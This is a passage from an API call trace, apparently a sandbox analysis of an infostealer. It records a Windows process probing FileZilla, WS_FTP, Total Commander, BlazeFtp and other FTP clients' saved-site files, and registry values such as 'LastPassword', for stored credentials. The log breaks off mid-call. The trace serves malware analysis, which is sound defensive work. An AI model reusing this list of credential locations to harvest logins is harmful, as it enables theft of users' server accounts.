0x750d0000 [0245.247] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0245.247] GetProcessHeap () returned 0x740000 [0245.247] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a698 [0245.247] GetProcessHeap () returned 0x740000 [0245.247] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.249] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0245.249] GetProcessHeap () returned 0x740000 [0245.250] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.250] GetProcessHeap () returned 0x740000 [0245.250] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.250] GetProcessHeap () returned 0x740000 [0245.250] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f74) returned 0x75b6c0 [0245.251] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.252] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FileZilla\\filezilla.xml", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0245.252] GetProcessHeap () returned 0x740000 [0245.252] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75a488 [0245.252] GetProcessHeap () returned 0x740000 [0245.253] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.254] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0245.254] GetProcessHeap () returned 0x740000 [0245.254] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.255] GetProcessHeap () returned 0x740000 [0245.255] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f7c) returned 0x75b6c0 [0245.256] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.257] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FileZilla\\recentservers.xml", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0245.257] GetProcessHeap () returned 0x740000 [0245.257] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0245.257] GetProcessHeap () returned 0x740000 [0245.257] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.259] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0245.259] GetProcessHeap () returned 0x740000 [0245.259] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.259] GetProcessHeap () returned 0x740000 [0245.259] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f78) returned 0x75b6c0 [0245.260] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.262] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0245.262] GetProcessHeap () returned 0x740000 [0245.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0245.262] GetProcessHeap () returned 0x740000 [0245.262] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.263] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0245.264] GetProcessHeap () returned 0x740000 [0245.264] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.264] GetProcessHeap () returned 0x740000 [0245.264] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.265] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.265] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.265] GetProcessHeap () returned 0x740000 [0245.265] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6c) returned 0x75b6c0 [0245.266] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.266] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Staff-FTP\\sites.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0245.266] GetProcessHeap () returned 0x740000 [0245.266] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a698 [0245.266] GetProcessHeap () returned 0x740000 [0245.267] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.305] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0245.305] GetProcessHeap () returned 0x740000 [0245.306] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.306] GetProcessHeap () returned 0x740000 [0245.306] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.306] GetProcessHeap () returned 0x740000 [0245.306] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f68) returned 0x75b6c0 [0245.307] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.307] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\BlazeFtp\\site.dat", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0245.307] GetProcessHeap () returned 0x740000 [0245.307] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757098 [0245.308] GetProcessHeap () returned 0x740000 [0245.309] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.310] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0245.310] GetProcessHeap () returned 0x740000 [0245.311] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757098 | out: hHeap=0x740000) returned 1 [0245.311] GetProcessHeap () returned 0x740000 [0245.311] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75a488 [0245.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.312] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x75a488, pcbData=0x19fb3c*=0x104 | out: pdwType=0x0, pvData=0x75a488, pcbData=0x19fb3c*=0x104) returned 0x2 [0245.312] GetProcessHeap () returned 0x740000 [0245.313] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.313] GetProcessHeap () returned 0x740000 [0245.313] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.350] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.351] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.351] GetProcessHeap () returned 0x740000 [0245.351] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x75b6c0 [0245.352] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.353] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0245.353] GetProcessHeap () returned 0x740000 [0245.353] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6c) returned 0x75a698 [0245.353] GetProcessHeap () returned 0x740000 [0245.354] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.355] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0245.356] GetProcessHeap () returned 0x740000 [0245.356] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.356] GetProcessHeap () returned 0x740000 [0245.356] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.356] GetProcessHeap () returned 0x740000 [0245.356] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.357] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.358] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.358] GetProcessHeap () returned 0x740000 [0245.358] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f82) returned 0x75b6c0 [0245.359] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.360] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0245.360] GetProcessHeap () returned 0x740000 [0245.360] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75a698 [0245.360] GetProcessHeap () returned 0x740000 [0245.361] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.377] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0245.378] GetProcessHeap () returned 0x740000 [0245.378] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.379] GetProcessHeap () returned 0x740000 [0245.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.415] GetProcessHeap () returned 0x740000 [0245.415] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f76) returned 0x75b6c0 [0245.416] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.417] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0245.417] GetProcessHeap () returned 0x740000 [0245.417] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0245.418] GetProcessHeap () returned 0x740000 [0245.418] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.419] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0245.419] GetProcessHeap () returned 0x740000 [0245.420] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.420] GetProcessHeap () returned 0x740000 [0245.420] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.421] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.421] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.421] GetProcessHeap () returned 0x740000 [0245.421] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6c) returned 0x75b6c0 [0245.422] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.423] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0245.423] GetProcessHeap () returned 0x740000 [0245.423] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a698 [0245.423] GetProcessHeap () returned 0x740000 [0245.424] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.425] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0245.426] GetProcessHeap () returned 0x740000 [0245.426] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.426] GetProcessHeap () returned 0x740000 [0245.426] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.426] GetProcessHeap () returned 0x740000 [0245.427] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.427] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.428] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Windows") returned 0x0 [0245.429] GetProcessHeap () returned 0x740000 [0245.429] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5c) returned 0x75b6c0 [0245.430] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.430] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0245.430] GetProcessHeap () returned 0x740000 [0245.430] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x30) returned 0x756a38 [0245.431] GetProcessHeap () returned 0x740000 [0245.431] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.432] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0245.433] GetProcessHeap () returned 0x740000 [0245.433] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756a38 | out: hHeap=0x740000) returned 1 [0245.433] GetProcessHeap () returned 0x740000 [0245.434] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.434] GetProcessHeap () returned 0x740000 [0245.434] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5c) returned 0x75b6c0 [0245.434] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.435] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0245.477] GetProcessHeap () returned 0x740000 [0245.478] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x66) returned 0x75a488 [0245.478] GetProcessHeap () returned 0x740000 [0245.478] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.480] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0245.480] GetProcessHeap () returned 0x740000 [0245.481] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.481] GetProcessHeap () returned 0x740000 [0245.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.482] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.482] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0245.482] GetProcessHeap () returned 0x740000 [0245.482] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5c) returned 0x75b6c0 [0245.483] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.484] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0245.484] GetProcessHeap () returned 0x740000 [0245.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x46) returned 0x75af58 [0245.484] GetProcessHeap () returned 0x740000 [0245.485] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.486] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0245.486] GetProcessHeap () returned 0x740000 [0245.486] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75af58 | out: hHeap=0x740000) returned 1 [0245.486] GetProcessHeap () returned 0x740000 [0245.487] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.487] GetProcessHeap () returned 0x740000 [0245.487] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6c) returned 0x75b6c0 [0245.488] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.488] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0245.488] GetProcessHeap () returned 0x740000 [0245.489] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x76) returned 0x756d18 [0245.489] GetProcessHeap () returned 0x740000 [0245.489] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.490] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0245.491] GetProcessHeap () returned 0x740000 [0245.491] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756d18 | out: hHeap=0x740000) returned 1 [0245.491] GetProcessHeap () returned 0x740000 [0245.491] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0245.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.493] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fb74*=0x104) returned 0x2 [0245.493] GetProcessHeap () returned 0x740000 [0245.493] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.494] GetProcessHeap () returned 0x740000 [0245.494] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.494] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.495] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.495] GetProcessHeap () returned 0x740000 [0245.495] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x75b6c0 [0245.496] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.496] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0245.496] GetProcessHeap () returned 0x740000 [0245.497] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6c) returned 0x75a6c0 [0245.497] GetProcessHeap () returned 0x740000 [0245.497] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.498] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0245.498] GetProcessHeap () returned 0x740000 [0245.498] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0245.499] GetProcessHeap () returned 0x740000 [0245.499] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.499] GetProcessHeap () returned 0x740000 [0245.499] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f70) returned 0x75b6c0 [0245.500] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.500] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FTPGetter\\servers.xml", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0245.501] GetProcessHeap () returned 0x740000 [0245.501] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75a488 [0245.501] GetProcessHeap () returned 0x740000 [0245.501] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.502] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0245.502] GetProcessHeap () returned 0x740000 [0245.502] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.503] GetProcessHeap () returned 0x740000 [0245.503] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.503] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.503] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.504] GetProcessHeap () returned 0x740000 [0245.504] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f68) returned 0x75b6c0 [0245.504] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.505] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0245.505] GetProcessHeap () returned 0x740000 [0245.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x54) returned 0x75a6c0 [0245.505] GetProcessHeap () returned 0x740000 [0245.505] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.506] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0245.507] GetProcessHeap () returned 0x740000 [0245.507] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0245.507] GetProcessHeap () returned 0x740000 [0245.507] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.507] GetProcessHeap () returned 0x740000 [0245.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.545] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.545] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Windows") returned 0x0 [0245.546] GetProcessHeap () returned 0x740000 [0245.546] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5a) returned 0x75b6c0 [0245.546] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.547] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\WS_FTP.INI", arglist=0x19fb90 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0245.547] GetProcessHeap () returned 0x740000 [0245.547] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2e) returned 0x756760 [0245.547] GetProcessHeap () returned 0x740000 [0245.548] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.549] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") returned 0 [0245.616] GetProcessHeap () returned 0x740000 [0245.617] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756760 | out: hHeap=0x740000) returned 1 [0245.617] GetProcessHeap () returned 0x740000 [0245.617] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.618] GetProcessHeap () returned 0x740000 [0245.618] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.618] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.619] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0245.619] GetProcessHeap () returned 0x740000 [0245.619] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75b6c0 [0245.620] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.620] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Ipswitch", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0245.620] GetProcessHeap () returned 0x740000 [0245.620] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a6c0 [0245.621] GetProcessHeap () returned 0x740000 [0245.621] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.622] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0245.622] GetProcessHeap () returned 0x740000 [0245.623] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.623] GetProcessHeap () returned 0x740000 [0245.623] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0245.623] GetProcessHeap () returned 0x740000 [0245.623] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.624] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.624] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0245.624] GetProcessHeap () returned 0x740000 [0245.625] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75b6c0 [0245.625] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.626] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\site.xml", 